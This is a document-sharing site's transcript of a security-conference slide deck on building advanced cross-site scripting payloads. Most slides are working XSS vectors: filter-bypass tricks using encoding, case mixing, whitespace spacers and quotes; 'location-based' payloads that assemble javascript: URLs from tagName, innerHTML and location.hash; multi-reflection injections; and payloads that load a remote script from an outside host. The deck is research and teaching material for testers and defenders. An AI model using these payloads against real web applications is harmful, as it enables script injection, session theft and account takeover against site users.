+ All Categories
Home > Documents > Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS...

Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS...

Date post: 28-May-2020
Category:

Documents
Upload: others
View: 19 times
Download: 0 times
Download Report this document
Share this document with a friend
61
Building Advanced XSS Vectors by @brutelogic
Transcript
Page 1: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Building Advanced XSS Vectors

by @brutelogic

Page 2: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

About

Page 3: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

About - Agenda● About● Vector Scheme● Vector Builder (webGun)● Agnostic Event Handlers● Reusing Native Code● Filter Bypass● Location Based Payloads● Multi Reflection

Page 4: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

About - Speaker● Security researcher @sucurisecurity● Former #1 @openbugbounty● Some HoF & acknowledgements● XSS expert

Page 5: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

About - Presentation● Not just another talk on XSS● Use of alert(1) for didactic purposes● Mainly about event based XSS ● Some stuff may be hard to follow

Page 6: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Vector Scheme

Page 7: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Vector Scheme

● Regular

<tag handler=code>

Example:

<svg onload=alert(1)>

Page 8: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Vector Scheme

● Full

extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3

Example:

<table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt(1)%09><td>AAAAAAAAA

Page 9: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Vector Builder (webGun)http://brutelogic.com.br/webgun

Page 10: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Vector Builder (webGun)● Interactive cheat sheet ● Builder of XSS vectors/payloads● More than 3k unique combinations● Event or tag oriented● Handlers by browser● Handlers by length*● Manual vector editing● Test on target or default test page

* for filter bypass procedure.

Page 11: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)
Page 12: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)
Page 13: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Agnostic Event Handlers

Page 14: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Agnostic Event Handlers● Used with almost any tag● Ones that work with arbitrary tags

Example: <brute

● Most require UI● Work on all major browsers

Page 15: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Agnostic Event Handlers - List● onblur● onclick● oncopy● oncontextmenu● oncut● ondblclick● ondrag● onfocus● oninput

● onkeydown● onkeypress● onkeyup● onmousedown● onmousemove● onmouseout● onmouseover● onmouseup● onpaste

Page 16: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Agnostic Event Handlers

● Example:

<brute onclick=alert(1)>clickme!

Page 17: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Reusing Native Code

Page 18: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Reusing Native Code

● Example 1

...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script>

● INPUT

"><script>alert(1)//or"><script>alert(1)<!--

Page 19: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Reusing Native Code

● Injection

...<input type="hidden" value=""><script>alert(1)//"></form><script type="text/javascript"> function x(){ do something }</script>

● Result

...<input type="hidden" value=""><script>alert(1)//"></form><script type="text/javascript"> function x(){ do something }</script>

Page 20: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Reusing Native Code● Example 2

…<input type="hidden" value="INPUT"></form><script type="text/javascript">

function x() {do something

}</script>

● INPUT

"><script src="//brutelogic.com.br/1

or

"><script src="//3334957647/1

Page 21: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Reusing Native Code● Injection

…<input type="hidden" value=""><script src="//brutelogic.com.br/1"></form><script type="text/javascript">

function x() {do something

}</script>

● Result

…<input type="hidden" value=""><script src="//brutelogic.com.br/1"></form><script type="text/javascript">

function x() {do something

}</script>

Page 22: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Filter Bypass

Page 23: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Filter Bypass - Procedure● Arbitrary tag + fake handler● Start with 5 chars, increase● Example

<x onxxx=1 (5) pass<x onxxxx=1 (6) pass<x onxxxxx=1 (7) block

Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow

Page 24: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Filter Bypass - Tricks● Encoding

%3Cx onxxx=1<%78 onxxx=1<x %6Fnxxx=1<x o%6Exxx=1<x on%78xx=1<x onxxx%3D1

● Mixed Case

<X onxxx=1<x ONxxx=1<x OnXxx=1<X OnXxx=1

● Doubling

<x onxxx=1 onxxx=1

Page 25: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Filter Bypass - Tricks● Spacers

<x/onxxx=1<x%09onxxx=1<x%0Aonxxx=1<x%0Conxxx=1<x%0Donxxx=1<x%2Fonxxx=1

● Combo

<x%2F1=">%22OnXxx%3D1

● Quotes

<x 1='1'onxxx=1<x 1="1"onxxx=1

● Mimetism

<x </onxxx=1 (closing tag)<x 1=">" onxxx=1 (text outside tag)<http://onxxx%3D1/ (URL)

Page 26: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads

Page 27: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads

● Really complex payloads can be built● document.location properties and similar● Avoiding special chars (at least between = and >)● Game over to filter

Page 28: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● location.protocol

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 29: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● location.hostname, document.domain

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 30: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● location.origin

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 31: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● location.pathname

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 32: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● location.search

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 33: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● previousSibling.nodeValue, document.body.textContent* ("Before")

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

* (may need to close the injected tag)

Page 34: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● tagName, nodeName ("Itself")

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 35: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● outerHTML ("Itself")

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 36: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● innerHTML* ("After")

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

* (may need to close the injected tag)

Page 37: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild.nodeValue ("After")

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

* (may need to close the injected tag)

Page 38: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● Location.hash ("Hash")

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 39: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Document Properties

● URL, location.href, baseURI, documentURI

protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3

Page 40: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Evolution 1<svg onload=location='javascript:alert(1)'>

<svg onload=location=location.hash.substr(1)>#javascript:alert(1)

<svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1)

<svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/.source+location.hash.substr(1)>#(1)

<svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/.source+location.hash[1]+1+location.hash[2]>#()

Page 41: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Evolution 2<javascript onclick=alert(tagName)>click me!

<javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So...

<javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1)<javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)

javascript + :"click me! + #"-alert(1)javascrip + t:"click me! + #"-alert(1)javas + cript:"click me! + #"-alert(1)

Page 42: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Taxonomy

● By Type

1. Location

2. Location Self

3. Location Self Plus

● By Positioning (Properties)

Before < Itself > After # Hash

Inside

Page 43: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location

● Location After (innerHTML)

<j onclick=location=innerHTML>javascript&colon;alert(1)//

● Location Inside (name+id)

<svg id=t:alert(1) name=javascrip onload=location=name+id>

Page 44: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location● Location Itself + After + Hash (tagName+innerHTML+location.hash)

<javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)

<javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'-alert(1)

<javascript onclick=location=tagName+innerHTML+URL>:"-'click me!</javascript>#'-alert(1)

Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)

Page 45: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location● Location Itself + Hash (tagName+URL)

<javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1)

(“Labeled Jump”)<javascript: onclick=location=tagName+URL>click me!#%0Aalert(1)

Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#%0Aalert(1)

Page 46: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location● Location After + Hash (innerHTML+URL)

<j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1)

<j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)

Page 47: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location● Location Itself + After + Hash (tagName+innerHTML+URL)

<javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'-alert(1)

<javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)

Page 48: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location● Location Itself + Before (tagName+previousSibling)

"-alert(9)<javascript:" onclick=location=tagName+previousSibling.nodeValue>click me!

● Location Itself + After + Before (tagName+innerHTML+previousSibling)

'-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling.nodeValue>cript:'click me!

Page 49: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location● Location After + Itself (innerHTML+outerHTML)

<alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me!*/</alert(1)<!-- -->

javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- -->

<j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:/*click me!

javascript:/*click me! + <j 1="*/""-alert(1)<!-- …

Page 50: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location● Location After + Before + Itself (innerHTML+previousSibling+outerHTML)

*/"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!

javascript:/*click me! + */" + <j"-alert(9)<!-- ...

*/"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!

javascript:/*click me! + */" + <j 1="-alert(9)//" ...

Page 51: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location Self● Location Self Inside

p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>

http://...?p=<svg/onload=alert(1)+

p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id>

http://...?p=<script/src=//brutelogic.com.br/1+

Page 52: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location Self● Location Self After

p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>

http://...?p=<svg/onload=alert(1)>

Page 53: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location Self Plus● Location Self Plus Itself

p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!

http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location%2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick="location+=outerHTML">

Page 54: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location Self Plus● Location Self Plus After

p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>

http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt;svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>

Page 55: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Location Based Payloads - Location Self Plus● Location Self Plus Before

p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!

http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location%2B=document.body.textContent%3Eclick%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!

Page 56: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Multi Reflection

Page 57: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Multi Reflection - Single Input● Double Reflection - Single Input

p='onload=alert(1)><svg/1='

'onload=alert(1)><svg/1='

… [code] …

'onload=alert(1)><svg/1='

● Double Reflection - Single Input (script)

p=’>alert(1)</script><script/1=’

p=*/alert(1)</script><script>/*

*/alert(1)</script><script>/*

… [code] …

*/alert(1)</script><script>/*

Page 58: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Multi Reflection - Single Input● Triple Reflection - Single Input

p=*/alert(1)">'onload="/*<svg/1='

p=`-alert(1)">'onload="`<svg/1='

`-alert(1)">'onload="`<svg/1='

… [code] …

`-alert(1)">'onload="`<svg/1='

… [code] …

`-alert(1)">'onload="`<svg/1='

● Triple Reflection - Single Input (script)

p=*/</script>'>alert(1)/*<script/1='

*/</script>'>alert(1)/*<script/1='

… [code] …

*/</script>'>alert(1)/*<script/1='

… [code] …

*/</script>'>alert(1)/*<script/1='

Page 59: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Multi Reflection - Multi Input● 2 inputs:

p=<svg/1='&q='onload=alert(1)>

● 3 inputs:

p=<svg 1='&q=onload='/*&r=*/alert(1)'>

Page 60: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Conclusion● XSS vectors can:

- be complex;

- easily evade filters;

- blow your mind.

Page 61: Building Advanced XSS Vectorsbrutelogic.com.br › docs › advanced-xss.pdfBuilding Advanced XSS Vectors by @brutelogic About About - Agenda About Vector Scheme Vector Builder (webGun)

Thanks!@brutelogic


Recommended
Advanced Persistent Threats (APTs) Subversive Multi-Vector Threats

Advanced Persistent Threats (APTs) Subversive Multi-Vector Threats

Documents

XSS Vulnerabilities

XSS Vulnerabilities

Documents

Introduction to Intel® Advanced Vector Extensions -

Introduction to Intel® Advanced Vector Extensions -

Documents

Post XSS Exploitation : Advanced Attacks and Remedies

Post XSS Exploitation : Advanced Attacks and Remedies

Education

Universal XSS via IE8s XSS Filters - Black Hat Briefings · Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides:

Universal XSS via IE8s XSS Filters - Black Hat Briefings · Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides:

Documents

XSS - brutelogic.com.brbrutelogic.com.br/docs/XSS-FTW.pdf · Agenda Fast Intro to XSS Dangers of XSS Virtual Defacement LSD - Leakage, Spying and Deceiving Account Stealing Memory

XSS - brutelogic.com.brbrutelogic.com.br/docs/XSS-FTW.pdf · Agenda Fast Intro to XSS Dangers of XSS Virtual Defacement LSD - Leakage, Spying and Deceiving Account Stealing Memory

Documents

Building Advanced XSS Vectors - Brute XSS · About - Presentation Not just another talk on XSS Use of alert(1) for didactic purposes Mainly about event based XSS Some stuff may be

Building Advanced XSS Vectors - Brute XSS · About - Presentation Not just another talk on XSS Use of alert(1) for didactic purposes Mainly about event based XSS Some stuff may be

Documents

MA Advanced Macroeconomics 2. Vector Autoregressions › MAMacro › part2.pdf · MA Advanced Macroeconomics 2. Vector Autoregressions Karl Whelan School of Economics, UCD Spring

MA Advanced Macroeconomics 2. Vector Autoregressions › MAMacro › part2.pdf · MA Advanced Macroeconomics 2. Vector Autoregressions Karl Whelan School of Economics, UCD Spring

Documents

XSS-GUARD : Precise Dynamic Prevention of Cross Site Scripting (XSS) Attacks

XSS-GUARD : Precise Dynamic Prevention of Cross Site Scripting (XSS) Attacks

Documents

Email is Today's #1 Advanced Threat Vector Infographic

Email is Today's #1 Advanced Threat Vector Infographic

Technology

Pattern Recognition Advanced The Support Vector Machine ...

Pattern Recognition Advanced The Support Vector Machine ...

Documents

XSS Cheatsheet - test2break.in€¦ · Web viewInject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up.

XSS Cheatsheet - test2break.in€¦ · Web viewInject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up.

Documents

CROSS SITE SCRIPTING (XSS) ATTACKS - OWASP · What is XSS Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSSdiffers

CROSS SITE SCRIPTING (XSS) ATTACKS - OWASP · What is XSS Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSSdiffers

Documents

FLASH Security & Advanced CSRF - OWASP · Can be triggered by the use of global flash variables in: getURL using payload javascript:alert('XSS') Load* functions using payload asfunction:getURL,javascript:alert('XSS')

FLASH Security & Advanced CSRF - OWASP · Can be triggered by the use of global flash variables in: getURL using payload javascript:alert('XSS') Load* functions using payload asfunction:getURL,javascript:alert('XSS')

Documents

Srikar Nadipally. Outline Finding and Exploiting XSS Vulnerabilities Standard Reflected XSS Stored XSS DOM based XSS Prevention of XSS attack Reflect.

Srikar Nadipally. Outline Finding and Exploiting XSS Vulnerabilities Standard Reflected XSS Stored XSS DOM based XSS Prevention of XSS attack Reflect.

Documents

Building Advanced XSS Vectors

Building Advanced XSS Vectors

Technology

Advanced XSS and Phishing Attacks - Quotium€¦ · Scripting With the Phishes Advanced XSS and Phishing Attacks Ofer Maor CTO, Hacktics OWASP IL September 2005 The last word in first

Advanced XSS and Phishing Attacks - Quotium€¦ · Scripting With the Phishes Advanced XSS and Phishing Attacks Ofer Maor CTO, Hacktics OWASP IL September 2005 The last word in first

Documents

Advanced Calibration Techniques for Vector Network …anlage.umd.edu/Agilent_Advanced_VNA_calibration.pdf · Welcome to “Advanced Calibration Techniques for Vector Network Analyzers.

Advanced Calibration Techniques for Vector Network …anlage.umd.edu/Agilent_Advanced_VNA_calibration.pdf · Welcome to “Advanced Calibration Techniques for Vector Network Analyzers.

Documents